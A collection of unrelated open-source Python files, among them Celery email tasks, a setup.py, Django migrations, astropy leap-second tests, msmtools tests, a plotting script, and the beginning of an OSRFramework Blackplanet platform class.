    configured Celery task serializer before the next run -- TODO confirm.
    """
    send_email(email_recipients, message, subject)
    next_date = calculate_next_date(period_data, datetime.strptime(last_date, '%Y-%m-%dT%H:%M:%S'))
    try:
        send_email_periodic_task.apply_async(
            args=[email_recipients, message, subject, period_data, next_date],
            eta=next_date)
    except Exception:
        # Scheduling is best-effort in production. Fixed: the previous bare
        # `except:` also swallowed SystemExit/KeyboardInterrupt.
        if DEBUG:
            raise
def setup_periodic_email_task(email_recipients, message, subject, period_data, date_start):
    """Schedule the first run of a periodic email series.

    Follow-up runs are chained by ``send_email_periodic_task``, which
    re-schedules itself after each delivery.
    """
    # NOTE: celery.add_periodic_task() was tried here, but the beat scheduler
    # is not reloaded when tasks are added at runtime, so self-rescheduling
    # apply_async calls are used instead.
    next_date = calculate_next_date(period_data, date_start)
    try:
        send_email_periodic_task.apply_async(
            args=[email_recipients, message, subject, period_data, next_date],
            eta=next_date)
    except Exception:
        # Scheduling is best-effort in production. Fixed: the previous bare
        # `except:` also swallowed SystemExit/KeyboardInterrupt.
        if DEBUG:
            raise
def calculate_next_date(data, date_start):
    """Return `date_start` advanced by the period described in `data`.

    `data` must contain one truthy key out of 'period_days', 'period_months'
    or 'period_years'; the first one found (in that order) wins.

    Raises
    ------
    ValueError
        If no period key is present. (Previously this fell through and
        raised an opaque UnboundLocalError on `next_date`.)
    """
    days = data.get('period_days')
    if days:
        return date_start + relativedelta(days=+days)
    months = data.get('period_months')
    if months:
        return date_start + relativedelta(months=+months)
    years = data.get('period_years')
    if years:
        return date_start + relativedelta(years=+years)
    raise ValueError('No period specified: expected one of period_days, '
                     'period_months or period_years in %r' % (data,))
def apply_send_email_task(email_recipients, email_message, subject, kwargs):
    """Queue a one-off email task, forwarding `kwargs` to ``apply_async``
    (e.g. a delayed ``eta`` or ``countdown``)."""
    try:
        send_email_task.apply_async(args=[email_recipients, email_message, subject], **kwargs)
    except Exception:
        # Queueing is best-effort (e.g. broker down). Fixed: the previous
        # bare `except:` also swallowed SystemExit/KeyboardInterrupt.
        if DEBUG:
            raise
| vsilent/Vision | app/tasks.py | Python | gpl-2.0 | 2,777 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Prefer setuptools; fall back to distutils on minimal installations.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup
import re
from codecs import open
# Read the package version from koordinates/__init__.py without importing
# the package (avoids pulling in its runtime dependencies at build time).
version = ""
with open("koordinates/__init__.py", "r") as fd:
    version = re.search(
        r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', fd.read(), re.MULTILINE
    ).group(1)
# The long description shown on PyPI comes straight from the README.
with open("README.md", "r", "utf-8") as f:
    readme = f.read()
setup(
    name="koordinates",
    packages=[
        "koordinates",
    ],
    version=version,
    description="A Python client library for a number of Koordinates web APIs",
    long_description=readme,
    long_description_content_type="text/markdown",
    author="Koordinates Limited",
    author_email="support@koordinates.com",
    url="https://github.com/koordinates/python-client",
    keywords="koordinates api",
    license="BSD",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: BSD License",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Scientific/Engineering :: GIS",
    ],
    python_requires=">=3.5",
    install_requires=[
        "python-dateutil>=2,<3",
        "pytz",
        "requests>=2.5,<3",
        "requests-toolbelt>=0.4,<1",
    ],
    tests_require=[
        "pytest>=3.3",
        "responses>=0.3",
        "coverage>=3.7,<4",
    ],
    zip_safe=False,
)
| koordinates/python-client | setup.py | Python | bsd-3-clause | 1,747 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated Django migration: adjusts two CharFields on
    # WaterSupplierMonthlyReport (indexing/length/nullability metadata only).
    dependencies = [
        ('cali_water', '0018_auto_20150501_1126'),
    ]
    operations = [
        # Add a DB index to hydrologic_region (max_length 255, nullable).
        migrations.AlterField(
            model_name='watersuppliermonthlyreport',
            name='hydrologic_region',
            field=models.CharField(db_index=True, max_length=255, null=True, verbose_name=b'Hydrologic Region', blank=True),
            preserve_default=True,
        ),
        # Widen the supplier slug to 255 characters (SlugField is indexed).
        migrations.AlterField(
            model_name='watersuppliermonthlyreport',
            name='supplier_slug',
            field=models.SlugField(max_length=255, null=True, verbose_name=b'Water Supplier Slug', blank=True),
            preserve_default=True,
        ),
    ]
| SCPR/accountability-tracker | cali_water/migrations/0019_auto_20150501_1150.py | Python | gpl-2.0 | 821 |
from .vnsipmd import MdApi
from .sip_constant import * | bigdig/vnpy | vnpy/api/sip/__init__.py | Python | mit | 54 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import urllib.request
import os
import locale
import platform
import pytest
import numpy as np
from numpy.testing import assert_array_equal
import erfa
from astropy.time import Time, TimeDelta
from astropy.utils.iers import iers
from astropy.utils.data import get_pkg_data_filename
SYSTEM_FILE = '/usr/share/zoneinfo/leap-seconds.list'
# Test leap_seconds.list in test/data.
LEAP_SECOND_LIST = get_pkg_data_filename('data/leap-seconds.list')
def test_configuration():
    # This test just ensures things stay consistent.
    # Adjust if changes are made.
    # The config defaults must track the module-level URL constants.
    assert iers.conf.iers_leap_second_auto_url == iers.IERS_LEAP_SECOND_URL
    assert iers.conf.ietf_leap_second_auto_url == iers.IETF_LEAP_SECOND_URL
class TestReading:
    """Basic tests that leap seconds can be read."""
    def verify_day_month_year(self, ls):
        # Leap seconds occur on Jan 1 or Jul 1 (pre-1970 entries excepted),
        # and the mjd column must agree with the year/month/day columns.
        assert np.all(ls['day'] == 1)
        assert np.all((ls['month'] == 1) | (ls['month'] == 7) |
                      (ls['year'] < 1970))
        assert np.all(ls['year'] >= 1960)
        t = Time({'year': ls['year'], 'month': ls['month'], 'day': ls['day']},
                 format='ymdhms')
        assert np.all(t == Time(ls['mjd'], format='mjd'))
    def test_read_leap_second_dat(self):
        ls = iers.LeapSeconds.from_iers_leap_seconds(
            iers.IERS_LEAP_SECOND_FILE)
        # Below, >= to take into account we might ship an updated file.
        assert ls.expires >= Time('2020-06-28', scale='tai')
        assert ls['mjd'][0] == 41317
        assert ls['tai_utc'][0] == 10
        assert ls['mjd'][-1] >= 57754
        assert ls['tai_utc'][-1] >= 37
        self.verify_day_month_year(ls)
    def test_read_leap_second_dat_locale(self):
        # Parsing must not depend on the process locale; try a French locale
        # and always restore the original one afterwards.
        current = locale.setlocale(locale.LC_ALL)
        try:
            if platform.system() == 'Darwin':
                locale.setlocale(locale.LC_ALL, 'fr_FR')
            else:
                locale.setlocale(locale.LC_ALL, 'fr_FR.utf8')
            ls = iers.LeapSeconds.from_iers_leap_seconds(
                iers.IERS_LEAP_SECOND_FILE)
        except locale.Error as e:
            pytest.skip(f'Locale error: {e}')
        finally:
            locale.setlocale(locale.LC_ALL, current)
        # Below, >= to take into account we might ship an updated file.
        assert ls.expires >= Time('2020-06-28', scale='tai')
    def test_open_leap_second_dat(self):
        # open() should give the same table as the explicit reader.
        ls = iers.LeapSeconds.from_iers_leap_seconds(
            iers.IERS_LEAP_SECOND_FILE)
        ls2 = iers.LeapSeconds.open(iers.IERS_LEAP_SECOND_FILE)
        assert np.all(ls == ls2)
    @pytest.mark.parametrize('file', (
        LEAP_SECOND_LIST,
        "file:" + urllib.request.pathname2url(LEAP_SECOND_LIST)))
    def test_read_leap_seconds_list(self, file):
        # Both a plain path and a file: URL must be accepted.
        ls = iers.LeapSeconds.from_leap_seconds_list(file)
        assert ls.expires == Time('2020-06-28', scale='tai')
        assert ls['mjd'][0] == 41317
        assert ls['tai_utc'][0] == 10
        assert ls['mjd'][-1] == 57754
        assert ls['tai_utc'][-1] == 37
        self.verify_day_month_year(ls)
    @pytest.mark.parametrize('file', (
        LEAP_SECOND_LIST,
        "file:" + urllib.request.pathname2url(LEAP_SECOND_LIST)))
    def test_open_leap_seconds_list(self, file):
        ls = iers.LeapSeconds.from_leap_seconds_list(file)
        ls2 = iers.LeapSeconds.open(file)
        assert np.all(ls == ls2)
    @pytest.mark.skipif(not os.path.isfile(SYSTEM_FILE),
                        reason=f'system does not have {SYSTEM_FILE}')
    def test_open_system_file(self):
        ls = iers.LeapSeconds.open(SYSTEM_FILE)
        expired = ls.expires < Time.now()
        if expired:
            pytest.skip("System leap second file is expired.")
        assert not expired
def make_fake_file(expiration, tmpdir):
    """Copy the built-in IERS leap-second file, but stamp it with a different
    expiration date, and return the path of the copy."""
    ls = iers.LeapSeconds.from_iers_leap_seconds()
    fake_file = str(tmpdir.join('fake_leap_seconds.dat'))
    # Drop the original two header lines and the trailing line; prepend an
    # expiration header the reader will parse.
    body_lines = str(ls).split('\n')[2:-1]
    with open(fake_file, 'w') as fh:
        fh.write(f'# File expires on {expiration}\n')
        fh.write('\n'.join(body_lines))
    return fake_file
def test_fake_file(tmpdir):
    # The expiration header written by make_fake_file must be parsed back.
    fake_file = make_fake_file('28 June 2345', tmpdir)
    fake = iers.LeapSeconds.from_iers_leap_seconds(fake_file)
    assert fake.expires == Time('2345-06-28', scale='tai')
# For this set of tests, leap-seconds are allowed to be expired
# except as explicitly tested.
@pytest.mark.filterwarnings(iers.IERSStaleWarning)
class TestAutoOpenExplicitLists:
    """Tests of auto_open() with explicit candidate-file lists."""
    def test_auto_open_simple(self):
        ls = iers.LeapSeconds.auto_open([iers.IERS_LEAP_SECOND_FILE])
        assert ls.meta['data_url'] == iers.IERS_LEAP_SECOND_FILE
    def test_auto_open_erfa(self):
        # Either candidate may win depending on which expires later.
        ls = iers.LeapSeconds.auto_open(['erfa', iers.IERS_LEAP_SECOND_FILE])
        assert ls.meta['data_url'] in ['erfa', iers.IERS_LEAP_SECOND_FILE]
    def test_fake_future_file(self, tmpdir):
        fake_file = make_fake_file('28 June 2345', tmpdir)
        # Try as system file for auto_open, setting auto_max_age such
        # that any ERFA or system files are guaranteed to be expired,
        # while the fake file is guaranteed to be OK.
        with iers.conf.set_temp('auto_max_age', -100000):
            ls = iers.LeapSeconds.auto_open([
                'erfa', iers.IERS_LEAP_SECOND_FILE, fake_file])
            assert ls.expires == Time('2345-06-28', scale='tai')
            assert ls.meta['data_url'] == str(fake_file)
            # And as URL
            fake_url = "file:" + urllib.request.pathname2url(fake_file)
            ls2 = iers.LeapSeconds.auto_open([
                'erfa', iers.IERS_LEAP_SECOND_FILE, fake_url])
            assert ls2.expires == Time('2345-06-28', scale='tai')
            assert ls2.meta['data_url'] == str(fake_url)
    def test_fake_expired_file(self, tmpdir):
        fake_file1 = make_fake_file('28 June 2010', tmpdir)
        fake_file2 = make_fake_file('27 June 2012', tmpdir)
        # Between these and the built-in one, the built-in file is best.
        ls = iers.LeapSeconds.auto_open([fake_file1, fake_file2,
                                         iers.IERS_LEAP_SECOND_FILE])
        assert ls.meta['data_url'] == iers.IERS_LEAP_SECOND_FILE
        # But if we remove the built-in one, the least expired one will be
        # used and we get a warning that it is stale.
        with pytest.warns(iers.IERSStaleWarning):
            ls2 = iers.LeapSeconds.auto_open([fake_file1, fake_file2])
        assert ls2.meta['data_url'] == fake_file2
        assert ls2.expires == Time('2012-06-27', scale='tai')
        # Use the fake files to make sure auto_max_age is safe.
        with iers.conf.set_temp('auto_max_age', None):
            ls3 = iers.LeapSeconds.auto_open([fake_file1,
                                              iers.IERS_LEAP_SECOND_FILE])
        assert ls3.meta['data_url'] == fake_file1
@pytest.mark.remote_data
class TestRemoteURLs:
    """Checks that the hosted IERS/IETF leap-second URLs can be opened."""
    def setup_class(cls):
        # Need auto_download so that IERS_B won't be loaded and cause tests to
        # fail.
        iers.conf.auto_download = True
    def teardown_class(cls):
        # This setting is to be consistent with astropy/conftest.py
        iers.conf.auto_download = False
    # In these tests, the results may be cached.
    # This is fine - no need to download again.
    def test_iers_url(self):
        ls = iers.LeapSeconds.auto_open([iers.IERS_LEAP_SECOND_URL])
        assert ls.expires > Time.now()
    def test_ietf_url(self):
        ls = iers.LeapSeconds.auto_open([iers.IETF_LEAP_SECOND_URL])
        assert ls.expires > Time.now()
class TestDefaultAutoOpen:
    """Test auto_open with different _auto_open_files."""
    def setup(self):
        # Identical to what is used in LeapSeconds.auto_open().
        self.good_enough = (iers.LeapSeconds._today()
                            + TimeDelta(180 - iers._none_to_float(iers.conf.auto_max_age),
                                        format='jd'))
        # Save the default candidate list; restored in teardown.
        self._auto_open_files = iers.LeapSeconds._auto_open_files.copy()
    def teardown(self):
        iers.LeapSeconds._auto_open_files = self._auto_open_files
    def remove_auto_open_files(self, *files):
        """Remove some files from the auto-opener.
        The default set is restored in teardown.
        """
        for f in files:
            iers.LeapSeconds._auto_open_files.remove(f)
    def test_erfa_found(self):
        # Set huge maximum age such that whatever ERFA has is OK.
        # Since it is checked first, it should thus be found.
        with iers.conf.set_temp('auto_max_age', 100000):
            ls = iers.LeapSeconds.open()
        assert ls.meta['data_url'] == 'erfa'
    def test_builtin_found(self):
        # Set huge maximum age such that built-in file is always OK.
        # If we remove 'erfa', it should thus be found.
        self.remove_auto_open_files('erfa')
        with iers.conf.set_temp('auto_max_age', 100000):
            ls = iers.LeapSeconds.open()
        assert ls.meta['data_url'] == iers.IERS_LEAP_SECOND_FILE
    # The test below is marked remote_data only to ensure it runs
    # as an allowed-fail job on CI: i.e., we will notice it (eventually)
    # but will not be misled in thinking that a PR is bad.
    @pytest.mark.remote_data
    def test_builtin_not_expired(self):
        # TODO: would be nice to have automatic PRs for this!
        ls = iers.LeapSeconds.open(iers.IERS_LEAP_SECOND_FILE)
        assert ls.expires > self.good_enough, (
            "The leap second file built in to astropy is expired. Fix with:\n"
            "cd astropy/utils/iers/data/; . update_builtin_iers.sh\n"
            "and commit as a PR (for details, see release procedure).")
    def test_fake_future_file(self, tmpdir):
        fake_file = make_fake_file('28 June 2345', tmpdir)
        # Try as system file for auto_open, setting auto_max_age such
        # that any ERFA or system files are guaranteed to be expired.
        with iers.conf.set_temp('auto_max_age', -100000), \
                iers.conf.set_temp('system_leap_second_file', fake_file):
            ls = iers.LeapSeconds.open()
        assert ls.expires == Time('2345-06-28', scale='tai')
        assert ls.meta['data_url'] == str(fake_file)
        # And as URL
        fake_url = "file:" + urllib.request.pathname2url(fake_file)
        with iers.conf.set_temp('auto_max_age', -100000), \
                iers.conf.set_temp('iers_leap_second_auto_url', fake_url):
            ls2 = iers.LeapSeconds.open()
        assert ls2.expires == Time('2345-06-28', scale='tai')
        assert ls2.meta['data_url'] == str(fake_url)
    def test_fake_expired_file(self, tmpdir):
        # Leave only the built-in file and the (fake) system file as sources.
        self.remove_auto_open_files('erfa', 'iers_leap_second_auto_url',
                                    'ietf_leap_second_auto_url')
        fake_file = make_fake_file('28 June 2010', tmpdir)
        with iers.conf.set_temp('system_leap_second_file', fake_file):
            # If we try this directly, the built-in file will be found.
            ls = iers.LeapSeconds.open()
            assert ls.meta['data_url'] == iers.IERS_LEAP_SECOND_FILE
            # But if we remove the built-in one, the expired one will be
            # used and we get a warning that it is stale.
            self.remove_auto_open_files(iers.IERS_LEAP_SECOND_FILE)
            with pytest.warns(iers.IERSStaleWarning):
                ls2 = iers.LeapSeconds.open()
            assert ls2.meta['data_url'] == fake_file
            assert ls2.expires == Time('2010-06-28', scale='tai')
    @pytest.mark.skipif(not os.path.isfile(SYSTEM_FILE),
                        reason=f'system does not have {SYSTEM_FILE}')
    def test_system_file_used_if_not_expired(self, tmpdir):
        # We skip the test if the system file is on a CI and is expired -
        # we should not depend on CI keeping it up to date, but if it is,
        # we should check that it is used if possible.
        if (iers.LeapSeconds.open(SYSTEM_FILE).expires <= self.good_enough):
            pytest.skip("System leap second file is expired.")
        self.remove_auto_open_files('erfa')
        with iers.conf.set_temp('system_leap_second_file', SYSTEM_FILE):
            ls = iers.LeapSeconds.open()
            assert ls.expires > self.good_enough
            assert ls.meta['data_url'] in (iers.IERS_LEAP_SECOND_FILE,
                                           SYSTEM_FILE)
            # Also check with a "built-in" file that is expired
            fake_file = make_fake_file('28 June 2017', tmpdir)
            iers.LeapSeconds._auto_open_files[0] = fake_file
            ls2 = iers.LeapSeconds.open()
            assert ls2.expires > Time.now()
            assert ls2.meta['data_url'] == SYSTEM_FILE
    @pytest.mark.remote_data
    def test_auto_open_urls_always_good_enough(self):
        # Avoid using the erfa, built-in and system files, as they might
        # be good enough already.
        try:
            # Need auto_download so that IERS_B won't be loaded and
            # cause tests to fail.
            iers.conf.auto_download = True
            self.remove_auto_open_files('erfa', iers.IERS_LEAP_SECOND_FILE,
                                        'system_leap_second_file')
            ls = iers.LeapSeconds.open()
            assert ls.expires > self.good_enough
            assert ls.meta['data_url'].startswith('http')
        finally:
            # This setting is to be consistent with astropy/conftest.py
            iers.conf.auto_download = False
class ERFALeapSecondsSafe:
    """Base class for tests that change the ERFA leap-second tables.

    It ensures the original state is restored.
    """
    def setup(self):
        # Keep the current leap-second table and expiration. The private
        # copies (_erfa_ls/_expires) are what teardown restores; subclasses
        # may rebind the public self.erfa_ls (TestUpdateLeapSeconds does)
        # without breaking the restoration.
        self.erfa_ls = self._erfa_ls = erfa.leap_seconds.get()
        self.erfa_expires = self._expires = erfa.leap_seconds._expires
    def teardown(self):
        # Restore leap-second table and expiration from the pristine copies
        # saved in setup(). Fixed: previously this used self.erfa_ls, which
        # subclasses overwrite, so the original state leaked between tests.
        erfa.leap_seconds.set(self._erfa_ls)
        erfa.leap_seconds._expires = self._expires
class TestFromERFA(ERFALeapSecondsSafe):
    """Round-trips between the ERFA leap-second table and LeapSeconds."""
    def test_get_erfa_ls(self):
        ls = iers.LeapSeconds.from_erfa()
        assert ls.colnames == ['year', 'month', 'tai_utc']
        assert isinstance(ls.expires, Time)
        assert ls.expires == self.erfa_expires
        ls_array = np.array(ls['year', 'month', 'tai_utc'])
        assert np.all(ls_array == self.erfa_ls)
    def test_get_built_in_erfa_ls(self):
        # built_in=True bypasses any runtime changes to the ERFA table.
        ls = iers.LeapSeconds.from_erfa(built_in=True)
        assert ls.colnames == ['year', 'month', 'tai_utc']
        assert isinstance(ls.expires, Time)
        ls_array = np.array(ls['year', 'month', 'tai_utc'])
        assert np.all(ls_array == self.erfa_ls[:len(ls_array)])
    def test_get_modified_erfa_ls(self):
        # Trim the runtime table: from_erfa() must reflect the trimmed state,
        # while built_in=True still returns the full compiled-in table.
        erfa.leap_seconds.set(self.erfa_ls[:-10])
        ls = iers.LeapSeconds.from_erfa()
        assert len(ls) == len(self.erfa_ls)-10
        ls_array = np.array(ls['year', 'month', 'tai_utc'])
        assert np.all(ls_array == self.erfa_ls[:-10])
        ls2 = iers.LeapSeconds.from_erfa(built_in=True)
        assert len(ls2) > len(ls)
        erfa.leap_seconds.set(None)
        erfa_built_in = erfa.leap_seconds.get()
        assert len(ls2) == len(erfa_built_in)
        ls2_array = np.array(ls2['year', 'month', 'tai_utc'])
        assert np.all(ls2_array == erfa_built_in)
    def test_open(self):
        # 'erfa' is accepted by open() as a special source name.
        ls = iers.LeapSeconds.open('erfa')
        assert isinstance(ls.expires, Time)
        assert ls.expires == self.erfa_expires
        ls_array = np.array(ls['year', 'month', 'tai_utc'])
        assert np.all(ls_array == self.erfa_ls)
class TestUpdateLeapSeconds(ERFALeapSecondsSafe):
    """Tests of ``LeapSeconds.update_erfa_leap_seconds`` against ERFA's table.

    NOTE(review): these tests mutate ERFA's process-wide leap-second table;
    ``ERFALeapSecondsSafe`` is presumably responsible for restoring it
    afterwards -- confirm in the base class.
    """
    def setup(self):
        super().setup()
        # Read default leap second table.
        self.ls = iers.LeapSeconds.from_iers_leap_seconds()
        # For tests, reset ERFA table to built-in default.
        erfa.leap_seconds.set()
        self.erfa_ls = erfa.leap_seconds.get()
    def test_built_in_up_to_date(self):
        """Leap second should match between built-in and ERFA."""
        # ERFA's table extends further back in time; compare only the
        # post-1970 overlap with the IERS-derived table.
        erfa_since_1970 = self.erfa_ls[self.erfa_ls['year'] > 1970]
        assert len(self.ls) >= len(erfa_since_1970), \
            "built-in leap seconds out of date"
        assert len(self.ls) <= len(erfa_since_1970), \
            "ERFA leap seconds out of date"
        overlap = np.array(self.ls['year', 'month', 'tai_utc'])
        assert np.all(overlap == erfa_since_1970.astype(overlap.dtype))
    def test_update_with_built_in(self):
        """An update with built-in should not do anything."""
        n_update = self.ls.update_erfa_leap_seconds()
        assert n_update == 0
        new_erfa_ls = erfa.leap_seconds.get()
        assert np.all(new_erfa_ls == self.erfa_ls)
    @pytest.mark.parametrize('n_short', (1, 3))
    def test_update(self, n_short):
        """Check whether we can recover removed leap seconds."""
        erfa.leap_seconds.set(self.erfa_ls[:-n_short])
        n_update = self.ls.update_erfa_leap_seconds()
        assert n_update == n_short
        new_erfa_ls = erfa.leap_seconds.get()
        assert_array_equal(new_erfa_ls, self.erfa_ls)
        # Check that a second update does not do anything.
        n_update2 = self.ls.update_erfa_leap_seconds()
        assert n_update2 == 0
        new_erfa_ls2 = erfa.leap_seconds.get()
        assert_array_equal(new_erfa_ls2, self.erfa_ls)
    def test_update_initialize_erfa(self):
        """``initialize_erfa=True`` resets ERFA first, so no entries are added."""
        # With pre-initialization, update does nothing.
        erfa.leap_seconds.set(self.erfa_ls[:-2])
        n_update = self.ls.update_erfa_leap_seconds(initialize_erfa=True)
        assert n_update == 0
        new_erfa_ls = erfa.leap_seconds.get()
        assert_array_equal(new_erfa_ls, self.erfa_ls)
    def test_update_overwrite(self):
        """``initialize_erfa='empty'`` clears ERFA, then every entry is added."""
        n_update = self.ls.update_erfa_leap_seconds(initialize_erfa='empty')
        assert n_update == len(self.ls)
        new_erfa_ls = erfa.leap_seconds.get()
        # Only post-1970 entries come from the IERS-derived table.
        assert new_erfa_ls['year'].min() > 1970
        # A second, plain update has nothing left to add.
        n_update2 = self.ls.update_erfa_leap_seconds()
        assert n_update2 == 0
        new_erfa_ls2 = erfa.leap_seconds.get()
        assert_array_equal(new_erfa_ls2, new_erfa_ls)
        # Re-initializing with the ERFA built-in restores the full table.
        n_update3 = self.ls.update_erfa_leap_seconds(initialize_erfa=True)
        assert n_update3 == 0
        new_erfa_ls3 = erfa.leap_seconds.get()
        assert_array_equal(new_erfa_ls3, self.erfa_ls)
    def test_bad_jump(self):
        """A table with an inconsistent TAI-UTC jump must be rejected."""
        erfa.leap_seconds.set(self.erfa_ls[:-2])
        bad = self.ls.copy()
        bad['tai_utc'][-1] = 5
        with pytest.raises(ValueError, match='jump'):
            bad.update_erfa_leap_seconds()
        # With an error the ERFA table should not change.
        assert_array_equal(erfa.leap_seconds.get(), self.erfa_ls[:-2])
        # Unless we initialized it beforehand.
        with pytest.raises(ValueError, match='jump'):
            bad.update_erfa_leap_seconds(initialize_erfa=True)
        assert_array_equal(erfa.leap_seconds.get(), self.erfa_ls)
        # Of course, we get no errors if we initialize only.
        erfa.leap_seconds.set(self.erfa_ls[:-2])
        n_update = bad.update_erfa_leap_seconds(initialize_erfa='only')
        assert n_update == 0
        new_erfa_ls = erfa.leap_seconds.get()
        assert_array_equal(new_erfa_ls, self.erfa_ls)
    def test_bad_day(self):
        """An entry not dated on the 1st of a month must be rejected."""
        erfa.leap_seconds.set(self.erfa_ls[:-2])
        bad = self.ls.copy()
        bad['day'][-1] = 5
        with pytest.raises(ValueError, match='not on 1st'):
            bad.update_erfa_leap_seconds()
    def test_bad_month(self):
        """An entry in a disallowed month (error mentions January) is rejected."""
        erfa.leap_seconds.set(self.erfa_ls[:-2])
        bad = self.ls.copy()
        bad['month'][-1] = 5
        with pytest.raises(ValueError, match='January'):
            bad.update_erfa_leap_seconds()
        # The ERFA table must be left untouched after the failure.
        assert_array_equal(erfa.leap_seconds.get(), self.erfa_ls[:-2])
| dhomeier/astropy | astropy/utils/iers/tests/test_leap_second.py | Python | bsd-3-clause | 19,966 |
# This file is part of MSMTools.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# MSMTools is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy as np
from msmtools.util.birth_death_chain import BirthDeathChain
from tests.numeric import assert_allclose
from msmtools.analysis.dense.stationary_vector import stationary_distribution_from_eigenvector
from msmtools.analysis.dense.stationary_vector import stationary_distribution_from_backward_iteration
class TestStationaryVector(unittest.TestCase):
    """Compare the dense stationary-vector solvers on a birth-death chain."""
    def setUp(self):
        """Set up meta-stable birth-death chain"""
        self.dim = 100
        self.k = 10
        # Uniform 0.5 birth/death probabilities, with the boundary entries
        # zeroed exactly as in a reflecting birth-death chain.
        birth = np.full(self.dim, 0.5)
        birth[-1] = 0.0
        death = np.full(self.dim, 0.5)
        death[0] = 0.0
        # Two tiny transition probabilities in the middle split the chain
        # into two metastable halves.
        birth[self.dim // 2 - 1] = 0.001
        death[self.dim // 2 + 1] = 0.001
        self.bdc = BirthDeathChain(death, birth)
    def test_statdist_decomposition(self):
        """The eigenvector-based solver reproduces the analytic distribution."""
        transition = self.bdc.transition_matrix()
        expected = self.bdc.stationary_distribution()
        computed = stationary_distribution_from_eigenvector(transition)
        assert_allclose(expected, computed)
    def test_statdist_iteration(self):
        """The backward-iteration solver reproduces the analytic distribution."""
        transition = self.bdc.transition_matrix()
        expected = self.bdc.stationary_distribution()
        computed = stationary_distribution_from_backward_iteration(transition)
        assert_allclose(expected, computed)
if __name__ == "__main__":
    # Allow running this test module directly via the unittest CLI.
    unittest.main()
| markovmodel/msmtools | tests/analysis/impl/dense/stationary_vector_test.py | Python | lgpl-3.0 | 2,003 |
#!/usr/local/bin/ipython -i
"""
A scatter graph of grid count vs grid area.
"""
import numpy as np
import matplotlib.pyplot as plt
# Extract data from csv.
file_name = "../data/tdwgsp_filtered.csv"
# Columns (filtered):
# 1 - star_infs
# 2 - tdwgtotals
# 3 - tdwgareas
#
# Read the file once instead of three times: with dtype=None and several
# usecols, genfromtxt returns a structured array whose fields default to
# 'f0', 'f1', 'f2' (one per requested column).
data = np.genfromtxt(file_name, delimiter=',', dtype=None, skip_header=1,
                     usecols=(1, 2, 3))
star_infs = data['f0']
tdwg_count = data['f1']
tdwg_area = data['f2']

# Remove the surrounding "" quotes from the star-rating strings.
stars = [star[1:-1] for star in star_infs]

# Map each star rating to a matplotlib colour code; anything unrecognised
# falls back to white.
STAR_COLOURS = {'BK': 'k', 'GD': 'y', 'BU': 'b', 'GN': 'g'}
colours = [STAR_COLOURS.get(star, 'w') for star in stars]

fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(tdwg_count, tdwg_area, c=colours, alpha=0.5)
ax.set_xlim(0, 250.1)
ax.set_ylim(0, 12000.1)
# Uncomment to manually set ticks.
# xtix = np.arange(0, 380000.1, 100000)
# ytix = np.arange(0, 1000.1, 200)
# ax.xaxis.set_ticks(xtix)
# ax.yaxis.set_ticks(ytix)
ax.set_xlabel('Number of TDWG Level 3 Code', fontsize=18)
ax.set_ylabel('Summed Area of TDWG Level 3 Code', fontsize=18)
ax.set_title('Species Geographic Range Size', fontsize=22)
ax.grid(True)
plt.show()
| Nodoka/Bioquality | graphing/tdwg_scatter.py | Python | mit | 1,350 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-09 10:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # First migration of the agenda app: creates the Event model.
    initial = True
    # Event.group references groups.Group, so that app's initial migration
    # must be applied first.
    dependencies = [
        ('groups', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Event',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=30)),
                ('description', models.TextField()),
                ('subject', models.CharField(max_length=20)),
                # Stored as a short string restricted to the three choices below.
                ('event_type', models.CharField(choices=[('quiz', 'Quiz'), ('test', 'Test'), ('homework', 'Homework')], max_length=8)),
                ('due', models.DateTimeField()),
                # Deleting a Group cascades to its Events.
                ('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='groups.Group')),
            ],
        ),
    ]
| MilyMilo/sci-organizer | agenda/migrations/0001_initial.py | Python | mit | 1,029 |
# !/usr/bin/python
# -*- coding: cp1252 -*-
#
##################################################################################
#
# Copyright 2016 Félix Brezo and Yaiza Rubio (i3visio, contacto@i3visio.com)
#
# This program is part of OSRFramework. You can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##################################################################################
import argparse
import json
import re
import sys
import urllib2
import osrframework.utils.browser as browser
from osrframework.utils.platforms import Platform
class Blackplanet(Platform):
    """
    A <Platform> object for Blackplanet.
    """
    def __init__(self):
        """
        Configure the Blackplanet platform wrapper.
        """
        self.platformName = "Blackplanet"
        self.tags = ["contact"]
        # Only usufy (username lookup) is supported by this wrapper.
        self.isValidMode = {
            "phonefy": False,
            "usufy": True,
            "searchfy": False,
        }
        # URL templates per mode; "<usufy>" is substituted with the nickname.
